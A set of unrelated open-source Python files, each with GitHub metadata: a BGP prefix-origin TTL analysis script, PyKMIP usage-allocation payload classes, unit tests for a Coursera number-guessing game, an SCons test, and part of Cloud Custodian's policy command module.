from __future__ import print_function
import argparse
import gzip
import os
import re
import sys
import json
import psycopg2
from time import sleep
from pymongo import MongoClient
from datetime import datetime, timedelta
from collections import OrderedDict
from multiprocessing import Process, Queue, cpu_count, current_process
verbose = False
warning = False
logging = False
def print_log(*objs):
if logging or verbose:
print("[LOGS] .", *objs, file=sys.stdout)
def print_info(*objs):
if verbose:
print("[INFO] ..", *objs, file=sys.stdout)
def print_warn(*objs):
if warning or verbose:
print("[WARN] ", *objs, file=sys.stderr)
def print_error(*objs):
print("[ERROR] ", *objs, file=sys.stderr)
def valid_date(s):
try:
return datetime.strptime(s, "%Y-%m-%d")
except ValueError:
msg = "Not a valid date: '{0}'.".format(s)
raise argparse.ArgumentTypeError(msg)
def origin_ttl_postgres(dbconnstr, outqeue, mints, maxts, mt, st):
print_log("CALL origin_ttl_postgres (%s,%s,%s,%s)" % (mints,maxts,mt,st))
print_info(dbconnstr)
try:
con = psycopg2.connect(dbconnstr)
except Exception, e:
print_error("origin_ttl_postgres: connecting to database")
print_error("failed with: %s" % ( e.message))
sys.exit(1)
cur = con.cursor()
query_datasets = ("SELECT id, ts FROM t_datasets WHERE ts >= '%s' "
"AND ts < '%s' AND maptype = '%s' "
"AND subtype = '%s' ORDER BY ts")
query_origins = ("SELECT p.prefix, o.asn FROM "
"(SELECT * FROM %s WHERE dataset_id = '%s') AS o "
"LEFT JOIN t_prefixes AS p ON o.prefix_id = p.id")
datasets = OrderedDict()
try:
query = query_datasets % (mints,maxts,mt,st)
cur.execute(query)
rs = cur.fetchall()
datasets = OrderedDict((row[0], row[1]) for row in rs)
except Exception, e:
print_error("QUERY: %s ; failed with: %s" % (query, e.message))
con.rollback()
print_log ("FOUND %s datasets." % str(len(datasets)))
origins = dict()
cnt = 0
for did in datasets:
cnt = cnt+1
print_info("RUN %s, processing did: %s, dts: %s" %
(cnt, did, datasets[did]))
ts_str = datasets[did]
ym_str = ts_str.strftime("%Y_%m")
table = "t_origins_"+ym_str
#ts = (datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S") -
# datetime(1970, 1, 1)).total_seconds()
ts = (ts_str - datetime(1970, 1, 1)).total_seconds()
# get origins of dataset
try:
query = query_origins % (table, did)
cur.execute(query)
rs = cur.fetchall()
except Exception, e:
print_error("QUERY: %s ; failed with: %s" % (query, e.message))
con.rollback()
else:
# update timestamps of prefix origin association
for row in rs:
pfx = str(row[0])
asn = int(row[1])
if pfx not in origins:
origins[pfx] = dict()
if asn not in origins[pfx]:
val = (ts_str,ts_str)
origins[pfx][asn] = val
else:
old = origins[pfx][asn]
val = (old[0],ts_str)
origins[pfx][asn] = val
# check prefix origin association, output and delete old ones
delorigin = list()
for pfx in origins:
for asn in origins[pfx]:
val = origins[pfx][asn]
if val[1] != ts_str:
ts0 = (val[0] - datetime(1970, 1, 1)).total_seconds()
ts1 = (val[1] - datetime(1970, 1, 1)).total_seconds()
ttl = int(ts1 - ts0)
if ttl > 0:
res = (pfx,asn,str(val[0]),str(val[1]),ttl)
outqeue.put(res)
dl = (pfx, asn)
delorigin.append(dl)
for d in delorigin:
pfx = d[0]
asn = d[1]
del origins[pfx][asn]
for pfx in origins:
for asn in origins[pfx]:
val = origins[pfx][asn]
ts0 = (val[0] - datetime(1970, 1, 1)).total_seconds()
ts1 = (val[1] - datetime(1970, 1, 1)).total_seconds()
ttl = int(ts1 - ts0)
if ttl > 0:
res = (pfx,asn,str(val[0]),str(val[1]),ttl)
outqeue.put(res)
return True
def output_thread(outqeue, opts):
print_log("CALL output_thread")
oid = 0
# init output
if opts[0] == 'json':
fout = opts[1]
f = sys.stdout
# open the output file whenever a name was given, appending ".gz" only if missing
if fout and (not fout.lower().endswith('.gz')):
fout = fout+".gz"
if fout:
f = gzip.open(fout, "wb")
header = ('{'
' "begin" : "%s",'
' "until" : "%s",'
' "maptype" : "%s",'
' "subtype" : "%s",'
' "origin_ttls" : [\n' % (opts[2:6]))
f.write(header)
f.flush()
elif opts[0] == 'postgres':
dbconnstr = opts[1]
try:
con = psycopg2.connect(dbconnstr)
except Exception, e:
print_error("retrieve_postgres: connecting to database")
print_error("failed with: %s" % ( e.message))
sys.exit(1)
cur = con.cursor()
insert_origin = ("INSERT INTO t_origin_ttl "
"(ts_begin, ts_until, maptype, subtype)"
" VALUES (%s, %s, %s, %s) RETURNING id")
insert_data = ("INSERT INTO t_origin_ttl_data "
"VALUES (%s,%s,%s,%s,%s,%s)")
query_prefix = "SELECT id FROM t_prefixes WHERE prefix = %s"
insert_prefix = "INSERT INTO t_prefixes (prefix) VALUES (%s) RETURNING id"
try:
cur.execute(insert_origin, [opts[2].strftime('%Y-%m-%d'),
opts[3].strftime('%Y-%m-%d'),
opts[4],opts[5]])
con.commit()
oid = cur.fetchone()[0]
except Exception, e:
print_error("INSERT t_origin_ttl failed with: %s" % (e.message))
con.rollback()
sys.exit(1)
else:
if oid == 0:
print_error("No valid origin_ttl id!")
sys.exit(1)
# get all prefixes already in database
query_all_prefixes = "SELECT prefix, id FROM t_prefixes"
prefix_ids = dict()
try:
cur.execute(query_all_prefixes)
pfx = cur.fetchall()
prefix_ids = dict((pfx[i][0], pfx[i][1]) for i in range(len(pfx)))
except Exception, e:
print_error("QUERY t_prefixes (1) failed with: %s" % (e.message))
con.rollback()
elif opts[0] == 'mongodb':
print_error("Not implemented yet! How did you even get here?!")
sys.exit(1)
else: # csv
fout = opts[1]
f = sys.stdout
if fout and (not fout.lower().endswith('.gz')):
fout = fout+".gz"
if fout:
f = gzip.open(fout, "wb")
header = ("# begin: %s\n"
"# until: %s\n"
"# maptype: %s\n"
"# subtype: %s\n"
"Prefix;ASN;ts0;ts1,ttl\n" % (opts[2:6]))
f.write(header)
f.flush()
# output queue data
first = True
while True:
odata = outqeue.get()
if (odata == 'DONE'):
print_log("EXIT output_thread")
break
if opts[0] == 'json':
if not first:
f.write(",\n")
else:
first = False
f.write(json.dumps(odata))
f.flush()
elif opts[0] == 'postgres':
pid = 0
pfx = odata[0]
if pfx in prefix_ids:
pid = prefix_ids[pfx]
else:
try:
cur.execute(insert_prefix, [pfx])
con.commit()
pid = cur.fetchone()[0]
except Exception, e:
print_error("INSERT t_prefixes failed with: %s" % (e.message))
con.rollback()
if pid > 0:
try:
cur.execute(insert_data,
[oid,pid,odata[1],odata[2],odata[3],odata[4]])
con.commit()
except Exception, e:
print_error("INSERT t_origin_ttl failed with: %s" % (e.message))
con.rollback()
else:
print_warn("Invalid ID for prefix %s" % (pfx))
elif opts[0] == 'mongodb':
print_error("WTF? Still not implemented yet! How'd u get here?")
sys.exit(1)
else:
f.write(';'.join(str(x) for x in odata) + "\n")
f.flush()
# finalize output
if opts[0] == 'json':
footer = (' ]\n}')
f.write(footer)
if opts[1]:
f.close()
elif opts[0] == 'csv':
f.flush()
if opts[1]:
f.close()
# and done
return True
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--logging',
help='print logging.',
action='store_true')
parser.add_argument('-w', '--warning',
help='print warnings.',
action='store_true')
parser.add_argument('-v', '--verbose',
help='print everything.',
action='store_true')
imode = parser.add_mutually_exclusive_group(required=True)
imode.add_argument('-m', '--mongodb',
help='Read from MongoDB.',
type=str)
imode.add_argument('-p', '--postgres',
help='Read from PostgresqlDB.',
type=str)
omode = parser.add_mutually_exclusive_group(required=False)
omode.add_argument('-c', '--csv',
help='Output data as CSV.',
action='store_true')
omode.add_argument('-j', '--json', help='Output data as JSON.',
action='store_true')
omode.add_argument('-d', '--database',
help="Store data into database (same as input).",
action='store_true')
parser.add_argument('-f', '--file',
help='Write data to file',
default=False)
parser.add_argument('-b', '--begin',
help='Begin date (inclusive), format: yyyy-mm-dd',
type=valid_date, default="2005-01-01")
parser.add_argument('-u', '--until',
help='Until date (exclusive), format: yyyy-mm-dd',
type=valid_date, default="2005-02-01")
parser.add_argument('-t', '--type',
help='Type of data source (show all: ?).',
type=str, default="routeviews")
parser.add_argument('-s', '--subtype',
help='Subtype of data source (show all: ?)',
type=str, default="route-views.eqix")
args = vars(parser.parse_args())
# output settings
global verbose
verbose = args['verbose']
global warning
warning = args['warning']
global logging
logging = args['logging']
# run
start_time = datetime.now()
print_log("START: " + start_time.strftime('%Y-%m-%d %H:%M:%S'))
begin = args['begin']
until = args['until']
maptype = args['type']
subtype = args['subtype']
# output options, tuple: how, where, ts0, ts1, type, subtype
oopts = ('csv', args['file'], begin, until, maptype, subtype)
if args['json']:
oopts = ('json', args['file'], begin, until, maptype, subtype)
elif args['database']:
if args['postgres']:
oopts = ('postgres', args['postgres'],
begin, until, maptype, subtype)
elif args['mongodb']:
oopts = ('mongodb', args['mongodb'],
begin, until, maptype, subtype)
# start output process to
output_queue = Queue()
if args['postgres']:
main_p = Process(target=origin_ttl_postgres,
args=(args['postgres'], output_queue,
begin, until, maptype, subtype))
else:
print_error('No valid data source found!')
sys.exit(1)
main_p.start()
output_p = Process(target=output_thread,
args=(output_queue, oopts))
output_p.start()
main_p.join()
output_queue.put('DONE')
output_p.join()
end_time = datetime.now()
print_log("FINISH: " + end_time.strftime('%Y-%m-%d %H:%M:%S'))
done_time = end_time - start_time
print_log(" processing time [s]: " + str(done_time.total_seconds()))
if __name__ == "__main__":
main()
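# Usage sketch (not part of the original script; the connection string and
# output file below are hypothetical, flags follow the argparse definitions
# above):
#
#   python bgp-origin-ttl.py -p "host=localhost dbname=bgp user=bgp" \
#       -b 2005-01-01 -u 2005-02-01 -t routeviews -s route-views.eqix \
#       -c -f origin_ttls.csv
#
# This reads the matching datasets from PostgreSQL, computes how long each
# prefix/origin association remained visible, and writes the results as a
# gzip-compressed CSV (the ".gz" suffix is appended automatically).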
| {
"content_hash": "d73cfd3b31160e184c3dccfbfb18986f",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 84,
"avg_line_length": 35.86065573770492,
"alnum_prop": 0.48205714285714285,
"repo_name": "smlng/bgp-stats",
"id": "b5c6c1830844b70b480016caa8a4b6fad31da5e3",
"size": "13144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/python/bgp-origin-ttl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "157967"
},
{
"name": "R",
"bytes": "22409"
},
{
"name": "Shell",
"bytes": "766"
}
],
"symlink_target": ""
} |
import six
from kmip import enums
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages.payloads import base
class GetUsageAllocationRequestPayload(base.RequestPayload):
"""
A request payload for the GetUsageAllocation operation.
Attributes:
unique_identifier: The unique ID of the object for which to obtain a
usage allocation.
usage_limits_count: The number of usage limits units that should be
reserved for the object.
"""
def __init__(self, unique_identifier=None, usage_limits_count=None):
"""
Construct a GetUsageAllocation request payload struct.
Args:
unique_identifier (string): The ID of the managed object (e.g.,
a public key) to obtain a usage allocation for. Optional,
defaults to None.
usage_limits_count (int): The number of usage limits units that
should be reserved for the object. Optional, defaults to None.
"""
super(GetUsageAllocationRequestPayload, self).__init__()
self._unique_identifier = None
self._usage_limits_count = None
self.unique_identifier = unique_identifier
self.usage_limits_count = usage_limits_count
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
else:
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("Unique identifier must be a string.")
@property
def usage_limits_count(self):
if self._usage_limits_count:
return self._usage_limits_count.value
else:
return None
@usage_limits_count.setter
def usage_limits_count(self, value):
if value is None:
self._usage_limits_count = None
elif isinstance(value, six.integer_types):
self._usage_limits_count = primitives.LongInteger(
value=value,
tag=enums.Tags.USAGE_LIMITS_COUNT
)
else:
raise TypeError("Usage limits count must be an integer.")
def read(self, input_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the GetUsageAllocation request payload and
decode it into its constituent parts.
Args:
input_stream (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is missing from the
encoded payload.
"""
super(GetUsageAllocationRequestPayload, self).read(
input_stream,
kmip_version=kmip_version
)
local_stream = utils.BytearrayStream(input_stream.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_stream):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_stream,
kmip_version=kmip_version
)
if self.is_tag_next(enums.Tags.USAGE_LIMITS_COUNT, local_stream):
self._usage_limits_count = primitives.LongInteger(
tag=enums.Tags.USAGE_LIMITS_COUNT
)
self._usage_limits_count.read(
local_stream,
kmip_version=kmip_version
)
self.is_oversized(local_stream)
def write(self, output_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the GetUsageAllocation request payload to a
stream.
Args:
output_stream (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is not defined.
"""
local_stream = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_stream,
kmip_version=kmip_version
)
if self._usage_limits_count:
self._usage_limits_count.write(
local_stream,
kmip_version=kmip_version
)
self.length = local_stream.length()
super(GetUsageAllocationRequestPayload, self).write(
output_stream,
kmip_version=kmip_version
)
output_stream.write(local_stream.buffer)
def __eq__(self, other):
if isinstance(other, GetUsageAllocationRequestPayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.usage_limits_count != other.usage_limits_count:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, GetUsageAllocationRequestPayload):
return not (self == other)
else:
return NotImplemented
def __repr__(self):
args = ", ".join([
"unique_identifier='{0}'".format(self.unique_identifier),
"usage_limits_count={0}".format(self.usage_limits_count)
])
return "GetUsageAllocationRequestPayload({0})".format(args)
def __str__(self):
return str({
'unique_identifier': self.unique_identifier,
'usage_limits_count': self.usage_limits_count
})
class GetUsageAllocationResponsePayload(base.ResponsePayload):
"""
A response payload for the GetUsageAllocation operation.
Attributes:
unique_identifier: The unique ID of the object that was allocated.
"""
def __init__(self, unique_identifier=None):
"""
Construct a GetUsageAllocation response payload struct.
Args:
unique_identifier (string): The ID of the managed object (e.g.,
a public key) that was allocated. Optional, defaults to None.
"""
super(GetUsageAllocationResponsePayload, self).__init__()
self._unique_identifier = None
self.unique_identifier = unique_identifier
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
else:
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("Unique identifier must be a string.")
def read(self, input_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the GetUsageAllocation response payload and
decode it into its constituent parts.
Args:
input_stream (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is missing from the
encoded payload.
"""
super(GetUsageAllocationResponsePayload, self).read(
input_stream,
kmip_version=kmip_version
)
local_stream = utils.BytearrayStream(input_stream.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_stream):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_stream,
kmip_version=kmip_version
)
self.is_oversized(local_stream)
def write(self, output_stream, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the GetUsageAllocation response payload to a
stream.
Args:
output_stream (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
ValueError: Raised if the data attribute is not defined.
"""
local_stream = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_stream,
kmip_version=kmip_version
)
self.length = local_stream.length()
super(GetUsageAllocationResponsePayload, self).write(
output_stream,
kmip_version=kmip_version
)
output_stream.write(local_stream.buffer)
def __eq__(self, other):
if isinstance(other, GetUsageAllocationResponsePayload):
if self.unique_identifier != other.unique_identifier:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, GetUsageAllocationResponsePayload):
return not (self == other)
else:
return NotImplemented
def __repr__(self):
args = "unique_identifier='{0}'".format(self.unique_identifier)
return "GetUsageAllocationResponsePayload({0})".format(args)
def __str__(self):
return str({
'unique_identifier': self.unique_identifier,
})
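# Example (a sketch, not part of the upstream module): build a request payload
# and round-trip it through a byte stream. The identifier below is a
# hypothetical placeholder value.
#
#   payload = GetUsageAllocationRequestPayload(
#       unique_identifier='2c23217e-f53c-4bdf-ad0a-58a31fd3d4b6',
#       usage_limits_count=500
#   )
#   stream = utils.BytearrayStream()
#   payload.write(stream, kmip_version=enums.KMIPVersion.KMIP_1_0)
#
#   decoded = GetUsageAllocationRequestPayload()
#   decoded.read(utils.BytearrayStream(stream.buffer),
#                kmip_version=enums.KMIPVersion.KMIP_1_0)
#   assert decoded == payload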
| {
"content_hash": "5754ef3c890e8cd625b1873fbc292881",
"timestamp": "",
"source": "github",
"line_count": 313,
"max_line_length": 78,
"avg_line_length": 34.52715654952077,
"alnum_prop": 0.593689275469603,
"repo_name": "OpenKMIP/PyKMIP",
"id": "9e98f84e5eb6e120266d6245f32a5e7359466876",
"size": "11453",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kmip/core/messages/payloads/get_usage_allocation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5552888"
},
{
"name": "Shell",
"bytes": "1214"
}
],
"symlink_target": ""
} |
"""
# @package coursera2012
# @author Rolf Hemmerling <[email protected]>
# @version 1.00
# @date 2015-01-01
# @copyright Apache License, Version 2.0
#
# Implementation of the game
# "Guess The Number"
# for the Coursera course
# "An Introduction to Interactive Programming in Python"
#
# Copyright 2012-2015 Rolf Hemmerling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
# import modules
import random
import unittest
import random
from guessthenumber import myRandomSeed
from guessthenumber import guessTheNumber
class setGuessesTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testInitGuesses(self):
"""test case set_guesses"""
self.gTN.set_guesses(7)
assert self.gTN.set_guesses(7) == self.gTN.remaining_guesses, "set_guesses() does not provide the right number"
assert self.gTN.set_guesses(7) == 7, "set_guesses() does not provide the right number"
assert self.gTN.set_guesses(7) != 8, "set_guesses() does not provide the right number"
class rangeTest(unittest.TestCase):
const_newgame_message100 = "Please guess a number in the range [0, 100)"
const_newgame_message1000 = "Please guess a number in the range [0, 1000)"
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testRange(self):
"""Test case range100, range1000. note that all test method names must begin with 'test.'"""
assert self.gTN.range100() == self.const_newgame_message100, "range100 does not provide the right string"
assert self.gTN.range1000() == self.const_newgame_message1000, "range1000 does not provide the right string"
assert self.gTN.range100() != self.const_newgame_message1000, "range100 does not provide the right string"
assert self.gTN.range1000() != self.const_newgame_message100, "range1000 does not provide the right string"
pass
class setRangeTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testSetRange(self):
"""test case set_range"""
assert self.gTN.set_range(100) == 100, "set_range() does not provide the right number"
assert self.gTN.set_range(1000) == 1000, "set_range() does not provide the right number"
assert self.gTN.set_range(100) != 1000, "set_range() does not provide the right number"
assert self.gTN.set_range(1000) != 100, "set_range() does not provide the right number"
class setSecretNumberTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testSetSecretNumber(self):
"""test case set_secret_number"""
global myRandomSeed
random.seed(myRandomSeed)
secret_number = self.gTN.set_secret_number()
assert secret_number == 23, "set_secret_number() does not provide the right number"
assert self.gTN.secret_number == 23, "set_secret_number() does not provide the right number"
class outOfRangeCheckTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testOutOfRangeCheck(self):
"""test case out_of_range_check """
assert self.gTN.out_of_range_check(99,100) == 99, "out_of_range_check() does not provide the right number"
assert self.gTN.out_of_range_check(100,100) == "Input is out of range!", "out_of_range_check() does not provide a proper return answer"
assert self.gTN.out_of_range_check(-1,100) == "Input is out of range!", "out_of_range_check() does not provide a proper return answer"
assert self.gTN.out_of_range_check(999,1000) == 999, "out_of_range_check() does not provide the right number"
assert self.gTN.out_of_range_check(1000,1000) == "Input is out of range!", "out_of_range_check() does not provide the right return answer"
assert self.gTN.out_of_range_check(-1,1000) == "Input is out of range!", "out_of_range_check() does not provide the right return answer"
class verifyInputTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testVerifyInput(self):
"""test case verify_input """
interactive_input = raw_input("Guess ( Please enter 55 ) = ")
guess = self.gTN.verify_input(interactive_input, 100)
assert guess == 55, "get_input() does not provide the right number"
class processPlayerInputTest(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
global myRandomSeed
random.seed(myRandomSeed)
self.gTN = guessTheNumber()
self.gTN.main()
def tearDown(self):
"""Call after every test case."""
def testProcessPlayerInput(self):
"""test case process_player_input"""
print ("das ist der Cheat = ", self.gTN.process_player_input("Cheat"))
assert self.gTN.process_player_input("Cheat") == "Secret number = 23", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(50) == "Lower!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(25) == "Lower!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(13) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(17) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(20) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(22) == "Higher!", "process_player_input() does not provide the right answer"
assert self.gTN.process_player_input(23) == "Correct!", "process_player_input() does not provide the right answer"
class guessTheNumberTest(unittest.TestCase):
def setUp(self):
global myRandomSeed
random.seed(myRandomSeed)
self.gTN = guessTheNumber()
def tearDown(self):
"""Call after every test case."""
def testGuessTheNumber(self):
assert self.gTN.main() == self.gTN.secret_number, 'main() does not provide the right secret number'
# run all tests
if __name__ == "__main__":
try:
unittest.main()
except SystemExit as inst:
if inst.args[0] is True: # raised by sys.exit(True) when tests failed
raise
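# Running the suite (a hedged note, not part of the original file): this is a
# Python 2 module, it imports guessthenumber from the same package, and the
# verifyInputTest case prompts interactively for the value 55, e.g.
#
#   python src/week2/week2_test.py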
| {
"content_hash": "a526f61fa106f845d2b90e21148998be",
"timestamp": "",
"source": "github",
"line_count": 183,
"max_line_length": 146,
"avg_line_length": 42.42622950819672,
"alnum_prop": 0.6477331272539928,
"repo_name": "hemmerling/python-coursera2012",
"id": "67e899b282efcf05ce192d0dee9600aeed41dcba",
"size": "7812",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/week2/week2_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "316418"
}
],
"symlink_target": ""
} |
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test how we handle a no-results test specified on the command line.
"""
import TestRuntest
pythonstring = TestRuntest.pythonstring
test = TestRuntest.TestRuntest()
test.subdir('test')
test.write_no_result_test(['test', 'no_result.py'])
expect_stdout = """\
%(pythonstring)s -tt test/no_result.py
NO RESULT TEST STDOUT
""" % locals()
expect_stderr = """\
NO RESULT TEST STDERR
"""
test.run(arguments='-b . test/no_result.py',
status=2,
stdout=expect_stdout,
stderr=expect_stderr)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| {
"content_hash": "a4f1d74495081707b97bbbec8390540e",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 67,
"avg_line_length": 19.135135135135137,
"alnum_prop": 0.6666666666666666,
"repo_name": "azverkan/scons",
"id": "8e0d0ddb935d8b596bb2e840ba30094ddfe9bcf2",
"size": "1810",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/runtest/baseline/no_result.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "259"
},
{
"name": "JavaScript",
"bytes": "17316"
},
{
"name": "Perl",
"bytes": "45214"
},
{
"name": "Python",
"bytes": "6727715"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import Counter, defaultdict
from datetime import timedelta, datetime
from functools import wraps
import inspect
import json
import logging
import os
import pprint
import sys
import time
import six
import yaml
from c7n.policy import Policy, PolicyCollection, load as policy_load
from c7n.reports import report as do_report
from c7n.utils import Bag, dumps, load_file
from c7n import provider
from c7n.resources import load_resources
from c7n import schema
log = logging.getLogger('custodian.commands')
def policy_command(f):
@wraps(f)
def _load_policies(options):
load_resources()
vars = _load_vars(options)
errors = 0
all_policies = PolicyCollection.from_data({}, options)
# Use the first region as the default for policy loading; we'll expand regions later.
options.region = options.regions[0]
for fp in options.configs:
try:
collection = policy_load(options, fp, vars=vars)
except IOError:
log.error('policy file does not exist ({})'.format(fp))
errors += 1
continue
except ValueError as e:
log.error('problem loading policy file ({})'.format(e))
errors += 1
continue
if collection is None:
log.debug('Loaded file {}. Contained no policies.'.format(fp))
else:
log.debug(
'Loaded file {}. Contains {} policies'.format(
fp, len(collection)))
all_policies = all_policies + collection
if errors > 0:
log.error('Found {} errors. Exiting.'.format(errors))
sys.exit(1)
# filter by name and resource type
policies = all_policies.filter(
getattr(options, 'policy_filter', None),
getattr(options, 'resource_type', None))
# expand by region, this results in a separate policy instance per region of execution.
policies = policies.expand_regions(options.regions)
if len(policies) == 0:
_print_no_policies_warning(options, all_policies)
# If we filtered out all the policies we want to exit with a
# non-zero status. But if the policy file is empty then continue
# on to the specific command to determine the exit status.
if len(all_policies) > 0:
sys.exit(1)
# Do not allow multiple policies in a region with the same name,
# even across files
policies_by_region = defaultdict(list)
for p in policies:
policies_by_region[p.options.region].append(p)
for region in policies_by_region.keys():
counts = Counter([p.name for p in policies_by_region[region]])
for policy, count in six.iteritems(counts):
if count > 1:
log.error("duplicate policy name '{}'".format(policy))
sys.exit(1)
return f(options, list(policies))
return _load_policies
def _load_vars(options):
vars = None
if options.vars:
try:
vars = load_file(options.vars)
except IOError as e:
log.error('Problem loading vars file "{}": {}'.format(options.vars, e.strerror))
sys.exit(1)
# TODO - provide builtin vars here (such as account)
return vars
def _print_no_policies_warning(options, policies):
if options.policy_filter or options.resource_type:
log.warning("Warning: no policies matched the filters provided.")
log.warning("Filters:")
if options.policy_filter:
log.warning(" Policy name filter (-p): " + options.policy_filter)
if options.resource_type:
log.warning(" Resource type filter (-t): " + options.resource_type)
log.warning("Available policies:")
for policy in policies:
log.warning(" - {} ({})".format(policy.name, policy.resource_type))
if not policies:
log.warning(" (none)")
else:
log.warning('Empty policy file(s). Nothing to do.')
def validate(options):
load_resources()
if len(options.configs) < 1:
log.error('no config files specified')
sys.exit(1)
used_policy_names = set()
schm = schema.generate()
errors = []
for config_file in options.configs:
config_file = os.path.expanduser(config_file)
if not os.path.exists(config_file):
raise ValueError("Invalid path for config %r" % config_file)
options.dryrun = True
fmt = config_file.rsplit('.', 1)[-1]
with open(config_file) as fh:
if fmt in ('yml', 'yaml'):
data = yaml.safe_load(fh.read())
elif fmt in ('json',):
data = json.load(fh)
else:
log.error("The config file must end in .json, .yml or .yaml.")
raise ValueError("The config file must end in .json, .yml or .yaml.")
errors += schema.validate(data, schm)
conf_policy_names = {
p.get('name', 'unknown') for p in data.get('policies', ())}
dupes = conf_policy_names.intersection(used_policy_names)
if len(dupes) >= 1:
errors.append(ValueError(
"Only one policy with a given name allowed, duplicates: %s" % (
", ".join(dupes)
)
))
used_policy_names = used_policy_names.union(conf_policy_names)
if not errors:
null_config = Bag(dryrun=True, log_group=None, cache=None, assume_role="na")
for p in data.get('policies', ()):
try:
policy = Policy(p, null_config, Bag())
policy.validate()
except Exception as e:
msg = "Policy: %s is invalid: %s" % (
p.get('name', 'unknown'), e)
errors.append(msg)
if not errors:
log.info("Configuration valid: {}".format(config_file))
continue
log.error("Configuration invalid: {}".format(config_file))
for e in errors:
log.error("%s" % e)
if errors:
sys.exit(1)
# This subcommand is disabled in cli.py.
# Commenting it out for coverage purposes.
#
# @policy_command
# def access(options, policies):
# permissions = set()
# for p in policies:
# permissions.update(p.get_permissions())
# pprint.pprint(sorted(list(permissions)))
@policy_command
def run(options, policies):
exit_code = 0
for policy in policies:
try:
policy()
except Exception:
exit_code = 2
if options.debug:
raise
log.exception(
"Error while executing policy %s, continuing" % (
policy.name))
if exit_code != 0:
sys.exit(exit_code)
